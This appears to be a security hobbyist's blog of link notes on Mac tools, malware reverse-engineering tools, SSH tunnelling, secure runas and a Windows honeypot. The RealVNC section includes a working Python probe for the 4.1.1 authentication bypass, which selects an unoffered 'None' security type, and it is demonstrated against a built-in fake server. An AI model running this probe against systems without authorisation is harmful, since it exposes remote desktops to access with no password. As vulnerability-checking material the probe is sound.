mac tools

This site purports to be a list of Mac hacking tools, but I see it more as a list of lesser-known general tools for Mac, some of which may only be useful to me if I get back into programming at some point. At any rate, a good list of tools with a blitz on what they’re used for and common switches.

reverse engineering windows malware

Snagged a bunch of tools and links dealing with reverse engineering malware, particularly Windows malware, but also other stuff. This is an area I'd love to get into some day, perhaps when I get more into coding as well. Either way, it is always useful to exercise one's ability to figure out what malware is doing, whether you run it on a live box in a lab network or examine the code straight-up.

IDA Pro – the universal first choice in malware analysis
ImpREC – rebuilds the import table of an executable dumped from memory after unpacking
PaiMei and PyDbg – Pedram Amini's reverse engineering framework and its pure-Python Win32 debugger
pydasm and pydot – Python bindings for the libdasm disassembler, and a Python interface for drawing Graphviz graphs (call graphs, control flow)
IDA Sync – shares names and comments between IDA sessions

vnc auth vulnerability

This is an awesome tutorial for finding and exploiting the latest RealVNC authentication vulnerability. I have a link to a scan tool that scans for this, and I have to find it. I suppose Metasploit will have this packaged already or soon. The fun thing about this is that I imagine most IT shops do not upgrade all their old VNC instances very often and either just reuse the same executable stored locally or always download a new one. I would bet many admins are still blissfully ignorant of this issue, and thus still have many vulnerable installs sitting around. I consider this a must-have scan for any VNC instances found on a target network.

Update: the scanner
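The vulnerability referred to above is the RealVNC 4.1.1 authentication bypass. In the RFB 3.7/3.8 handshake the server sends the list of security types it supports (normally only VNC Authentication, type 2) and the client picks one; the unpatched server did not check that the client's choice was actually on the list, so a client that asks for type 1 ("None") is let straight into the session with no password. The check below is an added example, not the linked scanner or Metasploit's module: it runs the handshake, deliberately selects "None" even though it was not offered, and reports a bypass only if the server answers SecurityResult 0 without ever having advertised "None". The small in-process server it is run against is a constructed stand-in that mimics both the vulnerable and the patched behaviour; it does not simulate the VNC Authentication challenge itself, since the probe never selects that type.

```python
import socket
import struct
import threading

RFB_VERSION = b"RFB 003.008\n"   # ProtocolVersion message is exactly 12 bytes
SEC_TYPE_NONE = 1                # "None": no authentication at all
SEC_TYPE_VNCAUTH = 2             # VNC Authentication: DES challenge/response


def _recv_exact(sock, n):
    """Read exactly n bytes or raise if the peer hangs up first."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def probe_security_types(sock):
    """Run the RFB 3.7/3.8 handshake on an already connected socket.

    Returns (advertised_types, bypass_accepted). bypass_accepted is True
    only when the server never offered type 1 (None) but still answered
    SecurityResult 0 (OK) after we selected it, i.e. it let us in without
    a password. A server that legitimately runs with no password advertises
    type 1 itself and is not reported as vulnerable.
    """
    server_version = _recv_exact(sock, 12)
    if not server_version.startswith(b"RFB 0"):
        raise ValueError("not an RFB server: %r" % server_version)
    if server_version < b"RFB 003.007":
        # 3.3 servers dictate a single u32 security type; there is no list to abuse.
        raise ValueError("RFB 3.3 server, list negotiation not used")
    sock.sendall(RFB_VERSION)

    count = _recv_exact(sock, 1)[0]
    if count == 0:
        # Zero types means the server refused us; a reason string follows.
        return [], False
    advertised = list(_recv_exact(sock, count))

    # The bug: pick "None" whether or not it was on the list.
    sock.sendall(bytes([SEC_TYPE_NONE]))
    try:
        (result,) = struct.unpack(">I", _recv_exact(sock, 4))
    except ConnectionError:
        # A patched server may simply drop the connection instead of answering.
        return advertised, False
    return advertised, (result == 0 and SEC_TYPE_NONE not in advertised)


def check_vnc_auth_bypass(host, port=5900, timeout=5.0):
    """Connect to a real VNC server and run the probe against it."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        return probe_security_types(sock)


def _fake_vnc_server(conn, vulnerable):
    """Constructed stand-in for a RealVNC-style server, offline demo only.

    Advertises only VNC Authentication (type 2). With vulnerable=True it
    accepts whatever type the client picks, as the unpatched server did;
    otherwise it rejects any type it did not offer.
    """
    with conn:
        conn.sendall(RFB_VERSION)
        _recv_exact(conn, 12)                          # client's version
        conn.sendall(bytes([1, SEC_TYPE_VNCAUTH]))     # count=1, list=[2]
        chosen = _recv_exact(conn, 1)[0]
        if vulnerable or chosen == SEC_TYPE_VNCAUTH:
            conn.sendall(struct.pack(">I", 0))         # SecurityResult OK
        else:
            conn.sendall(struct.pack(">I", 1))         # SecurityResult failed


def demo(vulnerable):
    """Run the probe against the constructed server over a socketpair."""
    client_end, server_end = socket.socketpair()
    server = threading.Thread(target=_fake_vnc_server,
                              args=(server_end, vulnerable))
    server.start()
    with client_end:
        outcome = probe_security_types(client_end)
    server.join()
    return outcome


if __name__ == "__main__":
    print("unpatched server:", demo(True))    # ([2], True)
    print("patched server:  ", demo(False))   # ([2], False)
```

Against a live host you are authorised to test, `check_vnc_auth_bypass(host)` does the same thing over TCP; `([2], True)` means the server lets anyone in without a password, while `([1], False)` is a server deliberately configured with no authentication, which is a separate finding rather than this bug.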

tunnel vnc over ssh

This article explains how to tunnel VNC traffic over SSH to create a secure way to connect back to your home computer from anywhere. I've always wanted to do this and have yet to do it. Basically this is just about poking a hole in your home firewall for SSH only, setting up an SSH server behind it, and configuring a local port forward through that SSH server to the internal VNC-equipped system, so the VNC viewer connects to a port on your own machine and the VNC traffic only ever crosses the Internet inside the encrypted SSH session. Nothing rocket-science here, and the technique can be used for pretty much any TCP service. We actually used a similar technique in my old job before we moved to a full VPN solution.

Want to run OpenSSH on a Windows box? This fun tutorial goes through the (overly complex) process!

scripted secure runas

Sometimes you need to regularly run something as an admin in Windows, but you might not necessarily want to give the user the local or domain admin password, save it in a cleartext file or shortcut, or run over to type it in when needed. These are some options for performing a runas without exposing the password. I've once used CPAU and it worked rather well. I had to give a SQL DBA access to production SQL servers and allow him to access other servers through admin shares via Enterprise Manager. Rather than give him a domain admin account, mess with permissions, or store the password in cleartext in a file or shortcut where he could look it up if he wanted to, I made a "secure" shortcut using CPAU. Pretty slick, and while it may have holes, it likely will stop any insiders from easily obtaining the credentials. This can be used for lesser cases like a user's program that might need some admin rights somewhere and would not run otherwise. Whatever tool is used, the credential has to be stored in a form the tool can decrypt at run time, so this raises the bar for a casual insider rather than for someone willing to attach a debugger to the launcher process.

This page has a bunch of choices for situations where runas needs to be secure.

im lock to lock down im apps

IM Lock sounds like it can block IM programs from running in Windows. I think this can be better solved with software policies and audits, and by removing admin rights for users. And the method to get around all of the above, using stand-alone, non-installable "underground" IM apps, still works regardless of any of these methods. So... might be interesting in case someone wants something like this.


curl

cURL is a command-line tool, available for Windows as well as *nix, in much the same vein as the "GET" command (lwp-request) found on many *nix systems: you can issue HTTP-style requests (plus FTP and a number of other protocols) straight from the command line and see the raw response. Pretty nifty!


honeybot: honeypot for windows

HoneyBot has been released; it is a honeypot app for Windows. This is pretty downright cool, and I need to find a box/place to put this up sometime... link found through Darknet. There are two systems I've wanted to have for some time: a honeypot to play with people/apps that break in, and a firewall/sniffer that just collects traffic and statistics.